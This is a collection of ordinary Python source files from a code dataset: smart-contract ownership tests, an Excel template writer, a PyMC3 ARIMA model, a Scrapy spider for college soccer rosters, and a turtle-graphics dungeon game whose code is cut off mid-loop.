+{"seq_id":"323549739","text":"import unittest\n\nfrom utils.deployutils import compile_contracts, attempt_deploy, mine_tx, MASTER, DUMMY\nfrom utils.deployutils import take_snapshot, restore_snapshot\nfrom utils.testutils import assertReverts, ZERO_ADDRESS\nfrom utils.testutils import generate_topic_event_map, get_event_data_from_log\n\nOWNED_SOURCE = \"contracts/Owned.sol\"\n\n\ndef setUpModule():\n print(\"Testing Owned...\")\n\n\ndef tearDownModule():\n print()\n\n\nclass TestOwned(unittest.TestCase):\n def setUp(self):\n self.snapshot = take_snapshot()\n\n def tearDown(self):\n restore_snapshot(self.snapshot)\n\n @classmethod\n def setUpClass(cls):\n cls.assertReverts = assertReverts\n\n compiled = compile_contracts([OWNED_SOURCE])\n cls.owned, txr = attempt_deploy(compiled, 'Owned', MASTER, [MASTER])\n\n cls.owner = lambda self: cls.owned.functions.owner().call()\n cls.nominatedOwner = lambda self: cls.owned.functions.nominatedOwner().call()\n cls.nominateOwner = lambda self, sender, newOwner: mine_tx(\n cls.owned.functions.nominateOwner(newOwner).transact({'from': sender}))\n cls.acceptOwnership = lambda self, sender: mine_tx(\n cls.owned.functions.acceptOwnership().transact({'from': sender}))\n\n cls.owned_event_map = generate_topic_event_map(compiled['Owned']['abi'])\n\n def test_owner_is_master(self):\n self.assertEqual(self.owner(), MASTER)\n\n def test_change_owner(self):\n old_owner = self.owner()\n new_owner = DUMMY\n\n self.assertReverts(self.nominateOwner, new_owner, old_owner)\n nominated_tx = self.nominateOwner(old_owner, new_owner)\n event_data = get_event_data_from_log(self.owned_event_map, nominated_tx.logs[0])\n self.assertEqual(event_data['event'], \"OwnerNominated\")\n self.assertEqual(event_data['args']['newOwner'], new_owner)\n\n self.assertEqual(self.owner(), old_owner)\n self.assertEqual(self.nominatedOwner(), new_owner)\n self.assertReverts(self.nominateOwner, new_owner, old_owner)\n accepted_tx = self.acceptOwnership(new_owner)\n event_data = get_event_data_from_log(self.owned_event_map, accepted_tx.logs[0])\n self.assertEqual(event_data['event'], \"OwnerChanged\")\n self.assertEqual(event_data['args']['oldOwner'], old_owner)\n self.assertEqual(event_data['args']['newOwner'], new_owner)\n\n 
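# once ownership is accepted, the nomination should reset to the zero address\n 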
self.assertEqual(self.nominatedOwner(), ZERO_ADDRESS)\n self.assertEqual(self.owner(), new_owner)\n self.assertReverts(self.nominateOwner, old_owner, new_owner)\n\n self.nominateOwner(new_owner, old_owner)\n self.acceptOwnership(old_owner)\n self.assertEqual(self.owner(), old_owner)\n\n def test_change_invalid_owner(self):\n invalid_account = DUMMY\n self.assertReverts(self.nominateOwner, invalid_account, invalid_account)\n\n def test_undo_change_owner(self):\n old_owner = self.owner()\n new_owner = DUMMY\n\n self.assertReverts(self.nominateOwner, new_owner, old_owner)\n self.nominateOwner(old_owner, new_owner)\n self.nominateOwner(old_owner, ZERO_ADDRESS)\n self.assertReverts(self.acceptOwnership, new_owner)\n","sub_path":"tests/test_Owned.py","file_name":"test_Owned.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433359679","text":"#encoding: utf-8\nimport xlrd\nimport xlwt\nimport xlutils.copy\n\ndef _getOutCell(outSheet, colIndex, rowIndex):\n \"\"\" HACK: Extract the internal xlwt cell representation. \"\"\"\n row = outSheet._Worksheet__rows.get(rowIndex)\n if not row: return None\n\n cell = row._Row__cells.get(colIndex)\n return cell\n\ndef setOutCell(outSheet, col, row, value):\n \"\"\" Change cell value without changing formatting. \"\"\"\n # HACK to retain cell style.\n previousCell = _getOutCell(outSheet, col, row)\n # END HACK, PART I\n\n outSheet.write(row, col, value)\n\n # HACK, PART II\n if previousCell:\n newCell = _getOutCell(outSheet, col, row)\n if newCell:\n newCell.xf_idx = previousCell.xf_idx\n # END HACK\n\ndef simple_excel(data, infile, outfile):\n\n data = [ [unicode(val, 'utf-8') if isinstance(val, basestring) else val for val in row] for row in data]\n\n inbook = xlrd.open_workbook(infile, formatting_info=True)\n outbook = xlutils.copy.copy(inbook)\n\n outSheet = outbook.get_sheet(0)\n for row, sub_data in enumerate(data):\n for col, value in enumerate(sub_data):\n setOutCell(outSheet, col, row, value)\n\n outbook.save(outfile)\n\ndef multi_sheet(infos, infile, outfile):\n\n inbook = xlrd.open_workbook(infile, formatting_info=True)\n outbook = xlutils.copy.copy(inbook)\n\n\n for id, info in enumerate(infos):\n info['data'] = [ [unicode(val, 'utf-8') if isinstance(val, basestring) else val for val in row] for row in info['data']]\n outSheet = outbook.get_sheet(id)\n for row, sub_data in enumerate(info['data']):\n for col, value in enumerate(sub_data):\n setOutCell(outSheet, col, row, value)\n\n outbook.save(outfile)\n'''\ndef multi_sheet(infos, filename):\n book = xlwt.Workbook()\n\n for info in infos:\n sheet = book.add_sheet(info['sheetname'])\n\n info['data'] = [ [unicode(val, 'utf-8') if isinstance(val, basestring) else val for val in row] for row in info['data']]\n\n for row, sub_data in enumerate(info['data']):\n for col, value in enumerate(sub_data):\n sheet.write(row, col, value)\n\n book.save(filename)\n'''\n\n","sub_path":"python/116_cronscript/lib/mkexcel2.py","file_name":"mkexcel2.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"55539931","text":"import pandas as pd\nimport pymc3 as pm\nfrom theano import scan, shared\nimport theano.tensor as tt\n\n\ndef build_model(X, treatment_start, treatment_observations):\n time_seen = pd.to_datetime(treatment_start) + pd.DateOffset(treatment_observations - 1)\n y = shared(X[:time_seen].values)\n y_switch = 
shared(X[:time_seen].index < treatment_start)\n with pm.Model() as i1ma1:\n σ = pm.HalfCauchy('σ', beta=2.)\n θ = pm.Normal('θ', 0., sd=2.)\n β = pm.Normal('β', 0., sd=2.)\n\n y_adj = tt.switch(y_switch, y, y - tt.dot(y, β))\n\n # ARIMA (0, 1, 1)\n # ---------------\n # (1 - B) y[t] = (1 - θB) ε[t]\n # y[t] - y[t-1] = ε[t] - θ * ε[t-1]\n # ε[t] = y[t] - y[t-1] - θ * ε[t-1]\n def calc_next(y_lag1, y_lag0, ε, θ):\n return y_lag0 - y_lag1 - θ * ε\n\n # Initial noise guess -- let's just seed with 0\n ε0 = tt.zeros_like(y_adj)\n\n ε, _ = scan(fn=calc_next,\n sequences=dict(input=y_adj, taps=[-1, 0]),\n outputs_info=[ε0],\n non_sequences=[θ])\n\n pm.Potential('like', pm.Normal.dist(0, sd=σ).logp(ε))\n return i1ma1\n","sub_path":"utils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522401192","text":"# -*- coding: utf-8 -*-\r\n\r\nimport scrapy\r\nimport sys\r\nimport re\r\nsys.path.append('..')\r\nfrom items import Player\r\nfrom soccerspider import SoccerSpider\r\nfrom CurrentRosterYear import get_current_roster_year\r\nfrom LeagueDictionary import get_college_from_url, check_league\r\nfrom TableSpider import TableSpider\r\n\r\nclass NewRosterDataTableDukeSpider(scrapy.Spider):\r\n\r\n \"\"\"\r\n Spider for websites formatted like Duke's and Holy Cross's page. Only for current roster year\r\n \"\"\"\r\n name = 'newRosterDataTableDukeSpider'\r\n\r\n current_roster_year = get_current_roster_year() #i.e 2018-2019\r\n\r\n custom_settings = {\r\n\r\n 'ITEM_PIPELINES':{\r\n 'SoccerScrape.pipelines.IncomingPlayerPipeline': 300,\r\n }\r\n }\r\n\r\n start_urls = [\r\n 'http://www.goduke.com/SportSelect.dbml?SPID=1833&SPSID=22446&DB_OEM_ID=4200',\r\n 'https://goholycross.com/SportSelect.dbml?DB_OEM_ID=33100&SPID=174208&SPSID=1020214'\r\n ]\r\n\r\n allowed_domains = [\r\n 'www.goduke.com',\r\n 'goholycross.com'\r\n ]\r\n\r\n INDEX = { #maps the school to where the attributes are in the HTMl tags\r\n 'www.goduke' :{'NUMBER': 1 ,'PLAYER_POSITION': 3, 'ACADEMIC_YEAR': 6, 'HEIGHT': 4, 'WEIGHT': 5 ,'LOCATION': 7},\r\n 'goholycross' :{'NUMBER': 1 ,'PLAYER_POSITION': 3, 'ACADEMIC_YEAR': 6, 'HEIGHT': 4, 'WEIGHT': 5 , 'LOCATION': 7}\r\n }\r\n\r\n def start_requests(self):\r\n \"\"\"\r\n Starts the http request\r\n \"\"\"\r\n for u in self.start_urls:\r\n try:\r\n yield scrapy.Request(u, callback=self.parse_list,\r\n errback=SoccerSpider.errback_httpbin, dont_filter=True)\r\n except ValueError:\r\n print(\"ValueError\")\r\n continue\r\n\r\n\r\n def parse_list(self, response):\r\n \"\"\"\r\n parses data in a table format similar to American University's\r\n \"\"\"\r\n self.logger.debug('Got successful response from {}'.format(response.url))\r\n players_table_view = '//*[@id=\"roster-list-table\"]/tbody/tr'\r\n players = response.xpath(players_table_view)\r\n school_url = response.url[response.url.index('/')+2:response.url.index('.com')] #domain for school\r\n\r\n roster_year = (response.xpath('//*[@id=\"roster-page\"]/h1/text()')\r\n .extract_first()\r\n .split(' ')[-2]\r\n .split('-')[1]\r\n .strip())\r\n\r\n for player in players:\r\n #extracting data from table\r\n playerItem = Player()\r\n player_name = player.xpath(\".//td[2]/a/text()\").extract_first().strip().split() #array [fn, ln]\r\n\r\n if(len(player_name) == 0):\r\n continue #skipping header row\r\n\r\n player_first_name = player_name[0].strip()\r\n player_last_name = \" \".join(player_name[1:]).strip()\r\n\r\n 
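# the td index for each field varies by school, so it is looked up in the INDEX map\r\n 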
player_position = player.xpath('.//td['+ self.reference_index(school_url, 'PLAYER_POSITION') + ']/text()').extract_first().strip() #'position'\r\n\r\n player_class_year = player.xpath('.//td['+ self.reference_index(school_url, 'ACADEMIC_YEAR') + ']/text()').extract()[1].strip()\r\n\r\n player_height = player.xpath('.//td['+ self.reference_index(school_url, 'HEIGHT') + ']/text()').extract() #array['feet-inches']\r\n\r\n number = player.xpath('.//td[' + self.reference_index(school_url, 'NUMBER') + ']/text()').extract_first().strip()\r\n\r\n weight = player.xpath('.//td[' + self.reference_index(school_url, 'WEIGHT') + ']/text()').extract_first().strip()\r\n\r\n if(len(player_height) == 0):\r\n player_height = 'NA'\r\n else:\r\n player_height = player_height[0].strip()\r\n\r\n player_location = player.xpath('.//td['+ self.reference_index(school_url, 'LOCATION') + ']/text()').extract_first().strip()\r\n\r\n #Item Processing\r\n playerItem['previousSchool'] = 'NA'\r\n self.process_player_location(playerItem, player_location)\r\n playerItem['rosterYear'] = roster_year\r\n playerItem['college'] = get_college_from_url(urlDomain=response.url[response.url.index('/')\r\n + 2:response.url.index('.com')+4])\r\n\r\n playerItem['collegeLeague'] = check_league(urlDomain=response.url[response.url.index('/')\r\n + 2:response.url.index('.com')+4])\r\n\r\n SoccerSpider.process_other_attribute(playerItem, player_first_name, 'firstName')\r\n SoccerSpider.process_other_attribute(playerItem, player_last_name, 'lastName')\r\n SoccerSpider.process_other_attribute(playerItem, player_position, 'position')\r\n SoccerSpider.process_other_attribute(playerItem, player_class_year, 'classYear')\r\n TableSpider.process_other_attribute(playerItem, player_height, 'height')\r\n SoccerSpider.process_other_attribute(playerItem, number, 'number')\r\n SoccerSpider.process_other_attribute(playerItem, weight, 'weight')\r\n\r\n href = player.xpath('.//td[2]/a/@href').extract_first()\r\n link = response.url[0:response.url.index('.com')+4] + href\r\n\r\n playerItem['profileLink'] = link\r\n\r\n yield playerItem\r\n\r\n\r\n def process_player_location(self, playerItem, player_location):\r\n \"\"\"\r\n method process_player_location processes attributes regarding high school, hometown, and home state\r\n type player_location: string formatted\r\n \"\"\"\r\n if not player_location:\r\n playerItem['homeTown'] = 'NA'\r\n playerItem['state_or_country'] = 'NA'\r\n playerItem['highSchool'] = 'NA'\r\n return\r\n\r\n split_location = player_location.split('(')\r\n homeTown = split_location[0].strip().split(',') #['hometown', 'state']\r\n playerItem['homeTown'] = re.sub(' +', ' ', homeTown[0].strip())\r\n playerItem['state_or_country'] = re.sub(' +', ' ', homeTown[1].strip())\r\n playerItem['highSchool'] = 'NA'\r\n\r\n if len(split_location) > 1:\r\n highSchool = split_location[1].strip()\r\n playerItem['highSchool'] = re.sub('[)]', '', highSchool)\r\n\r\n @classmethod\r\n def reference_index(self, school_url, attribute):\r\n \"\"\" Method reference_index looks up the proper index value in tages for the data needed\"\"\"\r\n return str(NewRosterDataTableDukeSpider.INDEX[school_url][attribute])\r\n\r\n\r\n","sub_path":"scripts/SoccerScrape/spiders/NewRosterDataTableViewDukeSpider.py","file_name":"NewRosterDataTableViewDukeSpider.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617989488","text":"\r\nfrom enemy import*\r\nfrom info import*\r\nfrom 
images import images\r\nfrom keybinding import keybinding\r\nfrom maps import*\r\nfrom intro import*\r\nfrom item import*\r\nimport turtle\r\nimport math\r\nimport random\r\nimport time\r\nimport winsound\r\n\r\nfor image in images:\r\n turtle.register_shape(image)\r\n\r\n#intro screen\r\n#------------------------------\r\nintro()\r\n\r\n#main screen \r\n#------------------------------\r\n\r\nwn = turtle.Screen()\r\nwn.bgcolor(\"black\")\r\nwn.title(\"7 Dungeons Deep (7DD)\")\r\nwn.setup(1900,930)\r\nwn.bgpic(\".\\\\art\\\\background.gif\")\r\nwn.tracer(0)\r\n\r\nclass Player(turtle.Turtle):\r\n def __init__(self):\r\n turtle.Turtle.__init__(self)\r\n self.shape(\".\\\\art\\\\heroright.gif\")\r\n self.penup()\r\n self.speed()\r\n self.fd(0)\r\n self.right=1\r\n self.left=0\r\n self.up=0\r\n self.down=0\r\n\r\n def headright(self):\r\n\r\n if self.right==1:\r\n pass\r\n\r\n if self.down==1:\r\n self.rt(270)\r\n self.down=0\r\n self.right=1 \r\n \r\n if self.left==1:\r\n self.rt(180)\r\n self.left=0\r\n self.right=1\r\n\r\n if self.up==1:\r\n self.rt(90)\r\n self.up=0\r\n self.right=1\r\n\r\n self.shape(\".\\\\art\\\\heroright.gif\")\r\n missile.shape(\".\\\\art\\\\arrowright.gif\")\r\n missile.fire()\r\n\r\n\r\n def headdown(self):\r\n\r\n if self.down==1:\r\n pass\r\n\r\n if self.left==1:\r\n \r\n self.rt(270)\r\n self.left=0\r\n self.down=1\r\n\r\n\r\n if self.up==1:\r\n \r\n self.rt(180)\r\n self.up=0\r\n self.down=1\r\n \r\n if self.right==1:\r\n \r\n self.rt(90)\r\n self.right=0\r\n self.down=1\r\n\r\n self.shape(\".\\\\art\\\\herodown.gif\")\r\n missile.shape(\".\\\\art\\\\arrowdown.gif\")\r\n missile.fire()\r\n\r\n def headleft(self):\r\n\r\n if self.left==1:\r\n pass\r\n\r\n if self.up==1:\r\n \r\n self.rt(270)\r\n self.up=0\r\n self.left=1\r\n\r\n if self.right==1:\r\n \r\n self.rt(180)\r\n self.right=0\r\n self.left=1\r\n\r\n if self.down==1:\r\n \r\n self.rt(90)\r\n self.down=0\r\n self.left=1\r\n\r\n self.shape(\".\\\\art\\\\heroleft.gif\")\r\n missile.shape(\".\\\\art\\\\arrowleft.gif\")\r\n missile.fire()\r\n \r\n def headup(self):\r\n \r\n if self.up==1:\r\n pass\r\n\r\n if self.right==1:\r\n \r\n self.rt(270)\r\n self.right=0\r\n self.up=1\r\n\r\n if self.down==1:\r\n \r\n self.rt(180)\r\n self.down=0\r\n self.up=1\r\n\r\n if self.left==1:\r\n \r\n self.rt(90)\r\n self.left=0\r\n self.up=1\r\n \r\n self.shape(\".\\\\art\\\\heroup.gif\")\r\n missile.shape(\".\\\\art\\\\arrowup.gif\")\r\n missile.fire()\r\n \r\n\r\n def go_up(self):\r\n\r\n if self.up==1:\r\n pass\r\n\r\n if self.right==1:\r\n \r\n self.rt(270)\r\n self.right=0\r\n self.up=1\r\n\r\n if self.down==1:\r\n \r\n self.rt(180)\r\n self.down=0\r\n self.up=1\r\n\r\n if self.left==1:\r\n \r\n self.rt(90)\r\n self.left=0\r\n self.up=1\r\n\r\n move_to_x = self.xcor()\r\n move_to_y = self.ycor()+24\r\n\r\n self.shape(\".\\\\art\\\\heroup.gif\")\r\n\r\n \r\n if (move_to_x, move_to_y) not in walls:\r\n self.goto(move_to_x, move_to_y)\r\n \r\n\r\n def go_down(self):\r\n\r\n if self.down==1:\r\n pass\r\n\r\n if self.left==1:\r\n \r\n self.rt(270)\r\n self.left=0\r\n self.down=1\r\n\r\n\r\n if self.up==1:\r\n \r\n self.rt(180)\r\n self.up=0\r\n self.down=1\r\n \r\n if self.right==1:\r\n \r\n self.rt(90)\r\n self.right=0\r\n self.down=1\r\n \r\n move_to_x = self.xcor()\r\n move_to_y = self.ycor()-24\r\n self.shape(\".\\\\art\\\\herodown.gif\")\r\n \r\n if (move_to_x, move_to_y) not in walls and npcs:\r\n self.goto(move_to_x, move_to_y)\r\n \r\n \r\n def go_left(self):\r\n\r\n if self.left==1:\r\n pass\r\n\r\n if self.up==1:\r\n 
\r\n self.rt(270)\r\n self.up=0\r\n self.left=1\r\n\r\n if self.right==1:\r\n \r\n self.rt(180)\r\n self.right=0\r\n self.left=1\r\n\r\n if self.down==1:\r\n \r\n self.rt(90)\r\n self.down=0\r\n self.left=1\r\n \r\n move_to_x = self.xcor()-24\r\n move_to_y = self.ycor()\r\n self.shape(\".\\\\art\\\\heroleft.gif\")\r\n \r\n if (move_to_x, move_to_y) not in walls :\r\n self.goto(move_to_x, move_to_y)\r\n \r\n def go_right(self):\r\n\r\n if self.right==1:\r\n pass\r\n\r\n if self.down==1:\r\n self.rt(270)\r\n self.down=0\r\n self.right=1 \r\n \r\n if self.left==1:\r\n self.rt(180)\r\n self.left=0\r\n self.right=1\r\n\r\n if self.up==1:\r\n self.rt(90)\r\n self.up=0\r\n self.right=1\r\n \r\n move_to_x = player.xcor()+24\r\n move_to_y = player.ycor()\r\n\r\n\r\n if (move_to_x, move_to_y) not in walls:\r\n self.goto(move_to_x, move_to_y)\r\n \r\n self.shape(\".\\\\art\\\\heroright.gif\")\r\n\r\n \r\n def drink(self):\r\n \r\n if info.potion>0 and info.hp is not info.fullhp : \r\n info.potion-=1\r\n info.show_healthpotion()\r\n\r\n if info.hp < info.fullhp-300:\r\n info.hp+=300\r\n info.show_health()\r\n else:\r\n info.hp=info.fullhp\r\n info.show_health()\r\n else:\r\n pass\r\n \r\n def fireball(self):\r\n if info.fire_scroll>0:\r\n info.fire_scroll-=1\r\n info.show_fire_scroll()\r\n missile2.fire()\r\n \r\n else:\r\n pass\r\n \r\n\r\n def is_collision(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance < 10:\r\n return True\r\n else:\r\n return False\r\n\r\n def is_collision2(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance < 50:\r\n return True\r\n else:\r\n return False\r\n\r\n def destroy(self):\r\n self.goto(500,500)\r\n self.hideturtle()\r\n\r\n\r\nclass Missile(turtle.Turtle):\r\n def __init__(self,startx, starty):\r\n turtle.Turtle.__init__(self)\r\n self.speed = 3\r\n self.fd(10)\r\n self.penup()\r\n self.color(\"yellow\")\r\n self.status = \"ready\"\r\n self.goto(-1000, 1000)\r\n\r\n def is_collision(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance < 22: # LESS THAN 25 OR YOU ATTACK DIAGANAL \r\n return True\r\n else:\r\n return False\r\n\r\n def is_far(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance >25:\r\n return True\r\n else:\r\n return False\r\n \r\n\r\n def fire(self):\r\n if self.status == \"ready\":\r\n self.goto(player.xcor(), player.ycor())\r\n self.setheading(player.heading())\r\n self.status = \"firing\"\r\n if lives != 3:\r\n winsound.PlaySound(\".\\\\sound\\\\swing.wav\", winsound.SND_ASYNC) \r\n \r\n def move(self):\r\n \r\n if self.status == \"ready\":\r\n self.goto(-2456, 3422)\r\n \r\n \r\n if self.status == \"firing\":\r\n self.fd(self.speed) \r\n \r\n #Border check\r\n\r\n\r\n if missile.is_far(player):\r\n self.setheading(player.heading())\r\n self.status = \"ready\" \r\n \r\n \r\n if self.xcor() < -400 or self.xcor() > 400 or \\\r\n self.ycor()< -400 or self.ycor()> 400:\r\n self.setheading(player.heading())\r\n self.status = \"ready\"\r\n\r\n if (self.xcor(), self.ycor()) in walls: \r\n self.setheading(player.heading())\r\n self.status = \"ready\"\r\n \r\nclass Missile2(turtle.Turtle):\r\n def __init__(self,startx, starty):\r\n turtle.Turtle.__init__(self)\r\n 
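# fireball projectile consumed from fire scrolls; deals a heavy fixed 400 damage\r\n 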
self.shape(\".\\\\art\\\\fire.gif\")\r\n self.speed = 3\r\n self.fd(10)\r\n self.damage=400\r\n self.penup()\r\n self.color(\"yellow\")\r\n self.status = \"ready\"\r\n self.goto(-1000, 1000)\r\n\r\n def is_collision(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance < 30:\r\n return True\r\n else:\r\n return False\r\n\r\n def is_far(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance >125:\r\n return True\r\n else:\r\n return False\r\n \r\n\r\n def fire(self):\r\n if self.status == \"ready\":\r\n self.goto(player.xcor(), player.ycor())\r\n self.setheading(player.heading())\r\n self.status = \"firing\"\r\n if lives != 3:\r\n winsound.PlaySound(\".\\\\sound\\\\fireball.wav\", winsound.SND_ASYNC)\r\n\r\n \r\n def move(self):\r\n \r\n if self.status == \"ready\":\r\n self.goto(-2456, 3422)\r\n \r\n \r\n if self.status == \"firing\":\r\n self.fd(self.speed) \r\n \r\n #Border check\r\n\r\n\r\n if missile2.is_far(player):\r\n self.setheading(player.heading())\r\n self.status = \"ready\" \r\n \r\n \r\n if self.xcor() < -400 or self.xcor() > 400 or \\\r\n self.ycor()< -400 or self.ycor()> 400:\r\n self.setheading(player.heading())\r\n self.status = \"ready\"\r\n\r\n if (self.xcor(), self.ycor()) in walls: \r\n self.setheading(player.heading())\r\n self.status = \"ready\"\r\n\r\n\r\nparticles = []\r\n\r\nfor i in range(15):\r\n particles.append(Particle(\"circle\", \"red\", 0, 0))\r\n \r\nmission=0\r\nlives=0\r\nquests2=[]\r\nquests=[]\r\nquest_items=[]\r\narmourupgrade=0\r\nweaponupgrade=0\r\ncrowns=[]\r\nenemies2 =[]\r\nenemies =[] \r\ncoins =[]\r\ndoors =[]\r\nhealings=[]\r\nfake_walls=[]\r\nnpcs=[]\r\nfirescrolls=[]\r\nswords=[]\r\narmours=[]\r\nwalls=[]\r\n\r\nlevels = [\"\"]\r\n\r\nlevels.append(level_1)\r\nlevels.append(level_2)\r\nlevels.append(level_3)\r\nlevels.append(level_4)\r\nlevels.append(level_5)\r\nlevels.append(level_6)\r\nlevels.append(level_7)\r\nlevels.append(level_8)\r\n\r\n#row are y ( up/down) column are x (left and right )\r\n# \r\n\r\ndef setup_maze(level):\r\n for y in range (len(level)): #tell how many rows there is \r\n for x in range(len(level[y])): # acquire every x of the y row\r\n #Get the character at each x,y coordinate\r\n #NOTE the order of Y AND X in the next line\r\n character = level [y][x]\r\n #Calculate the screen x,y coordinates. 
Furtherest left upper corner is (0,0)\r\n screen_x = -350 + (x*24)\r\n screen_y = 288 - (y*24)\r\n\r\n #check if it is an x represent a wall\r\n if character == \"X\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\wall.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n if character == \"T\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\torch.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n if character == \"Y\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\skeleton.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n if character == \"G\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\tree.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n if character == \"R\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\rock.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n if character == \"V\": \r\n pen.goto(screen_x, screen_y)\r\n pen.shape(\".\\\\art\\\\cage.gif\")\r\n pen.stamp()\r\n walls.append((screen_x,screen_y))\r\n\r\n\r\n\r\n\r\n \r\n if character == \"P\": # p= player \r\n player.goto(screen_x, screen_y)\r\n\r\n if character == \"C\":\r\n coins.append(Coin(screen_x, screen_y))\r\n \r\n if character ==\"E\":\r\n enemies.append(Enemy(screen_x, screen_y,player,walls))\r\n\r\n if character ==\"D\":\r\n doors.append(Door(screen_x, screen_y))\r\n\r\n if character ==\"M\":\r\n crowns.append(Crown(screen_x, screen_y))\r\n\r\n if character ==\"H\":\r\n healings.append(Healing(screen_x, screen_y))\r\n\r\n if character ==\"F\":\r\n firescrolls.append(Firescroll(screen_x, screen_y))\r\n\r\n if character ==\"A\":\r\n armours.append(Armour(screen_x, screen_y))\r\n\r\n if character ==\"S\":\r\n swords.append(Sword(screen_x, screen_y))\r\n\r\n if character ==\"Z\":\r\n enemies.append(Enemy2(screen_x, screen_y,player,walls))\r\n\r\n\r\n if character ==\"N\":\r\n npcs.append(Npc(screen_x, screen_y))\r\n\r\n if character ==\"Q\":\r\n quests.append(Quest(screen_x, screen_y))\r\n\r\n if character ==\"B\":\r\n quest_items.append(Quest_item(screen_x, screen_y))\r\n\r\n if character ==\"I\":\r\n fake_walls.append(Fake_wall(screen_x, screen_y))\r\n\r\n if character ==\"J\":\r\n enemies.append(Enemy3(screen_x, screen_y,player,walls))\r\n\r\n if character ==\"L\":\r\n enemies.append(Enemy4(screen_x, screen_y,player,walls))\r\n\r\n if character ==\"K\":\r\n quests2.append(Quest2(screen_x, screen_y))\r\n \r\n \r\npen=Pen()\r\nplayer= Player()\r\nmissile = Missile(0, 0)\r\nmissile2 = Missile2(0, 0)\r\n\r\n\r\nsetup_maze(levels[1])\r\nmaze=(\"level1\")\r\n\r\ninfo=Info()\r\ngame=Info()\r\ngame.draw_border()\r\ngame.draw_border2()\r\ngame.draw_border3()\r\ngame.draw_border4()\r\ngame.show_rules()\r\ngame.show_gold()\r\ngame.show_armour()\r\ngame.show_weapon()\r\ninfo.show_health()\r\ninfo.show_strength()\r\ninfo.show_level()\r\ninfo.show_healthpotion()\r\ninfo.show_fire_scroll()\r\ninfo.show_exp()\r\ninfo.show_defense()\r\n\r\n\r\n#keyboard binding\r\n\r\nkeybinding(player)\r\n\r\nfor enemy in enemies:\r\n turtle.ontimer(enemy.move(walls,player),t=250)\r\n\r\n \r\n\r\n#bob=0\r\n\r\nwhile True:\r\n \r\n # bob+=1\r\n # while bob ==300:\r\n\r\n # for enemy in enemies:\r\n # turtle.ontimer(enemy.move(walls,player),t=100)\r\n # bob=0\r\n \r\n \r\n missile.move()\r\n missile2.move()\r\n\r\n for particle in particles:\r\n particle.move()\r\n \r\n for armour in armours:\r\n\r\n if player.is_collision(armour):\r\n\r\n armour.destroy()\r\n\r\n if 
armourupgrade==1:\r\n info.armourstats+=4\r\n game.armour=(\"Mythril Plate\")\r\n game.show_armour()\r\n info.show_defense()\r\n armourupgrade+=1\r\n winsound.PlaySound(\".\\\\sound\\\\armour.wav\", winsound.SND_ASYNC)\r\n\r\n if armourupgrade==0:\r\n info.armourstats+=6\r\n game.armour=(\"Steel Plate\")\r\n game.show_armour()\r\n info.show_defense()\r\n armourupgrade+=1\r\n winsound.PlaySound(\".\\\\sound\\\\armour.wav\", winsound.SND_ASYNC)\r\n\r\n for npc in npcs:\r\n\r\n if player.is_collision(npc): \r\n game.intro() \r\n Npc.destroy(npc)\r\n \r\n for quest in quests:\r\n\r\n if player.is_collision2(quest):\r\n if mission ==0:\r\n game.start()\r\n \r\n if mission ==1:\r\n game.end()\r\n info.exp+=quest.exp\r\n info.show_exp()\r\n Quest.destroy(quest)\r\n\r\n\r\n for quest2 in quests2:\r\n\r\n if player.is_collision2(quest2):\r\n if info.boss ==0:\r\n game.start2()\r\n \r\n if info.boss ==1:\r\n game.end2()\r\n info.exp+=200\r\n info.show_exp()\r\n Quest.destroy(quest2)\r\n\r\n for quest_item in quest_items:\r\n if player.is_collision(quest_item):\r\n mission=1\r\n Quest_item.destroy(quest_item)\r\n winsound.PlaySound(\".\\\\sound\\\\key.wav\", winsound.SND_ASYNC)\r\n \r\n\r\n for sword in swords:\r\n\r\n if player.is_collision(sword):\r\n\r\n sword.destroy()\r\n\r\n if weaponupgrade==1:\r\n info.weaponstats+=4\r\n game.weapon=(\"Mythril Sword\")\r\n game.show_weapon()\r\n info.show_strength()\r\n weaponupgrade+=1\r\n winsound.PlaySound(\".\\\\sound\\\\sword.wav\", winsound.SND_ASYNC)\r\n\r\n if weaponupgrade==0:\r\n info.weaponstats+=6\r\n game.weapon=(\"Steel Sword\")\r\n game.show_weapon()\r\n info.show_strength()\r\n weaponupgrade+=1\r\n winsound.PlaySound(\".\\\\sound\\\\sword.wav\", winsound.SND_ASYNC)\r\n\r\n for firescroll in firescrolls:\r\n\r\n if player.is_collision(firescroll):\r\n\r\n 